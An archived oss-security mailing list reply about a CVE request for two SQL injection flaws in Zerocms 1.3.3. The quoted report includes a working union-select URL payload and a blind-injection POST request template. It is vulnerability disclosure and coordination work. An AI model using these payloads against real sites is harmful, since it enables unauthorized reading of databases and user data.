Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 1 Feb 2015 15:49:16 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

I just got a reply from MITRE.

I missed, that the first SQL injection vulnerability already had been
assigned CVE-2014-4034. Sorry, I missed that one.


Greetings.

Steffen

2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986@...il.com>
:

> Hi Steve, Josh, vendors, list.
>
> I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.
>
> The first SQL injection vulnerability is located in the article_id
> parameter used in zero_view_article.php and can be exploited even by
> unauthenticated attackers.
>
> See the following exploit-example:
>
> http://
> {TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+
>
> The second vulnerability is a Blind SQL injection an is located in the
> user_id parameter used in a POST request in zero_transact_user.php.
>
> An attacker can exploit this vulnerabilitiy in the administrative backend
> via the following POST request exploit-example:
>
> POST /views/zero_transact_user.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
> Gecko/20100101 Firefox/35.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> DNT: 1
> Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
> Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
> Connection: keep-alive
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 91
>
> name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection
> goes here}&action=Modify+Account
>
> Could you please assign a CVE-ID for this?
>
> Thank you very much.
>
> Greetings from Germany.
>
> Steffen Rösemann
>
> References:
>
> [1] http://aas9.in/zerocms/
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
> [3] https://github.com/perezkarjee/zerocms/issues/3
> [4] https://github.com/sroesemann/zerocms
> [5] https://twitter.com/sroesemann/status/559273548691546113
> [6]
> http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
> [7] http://seclists.org/fulldisclosure/2015/Feb/4
>

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ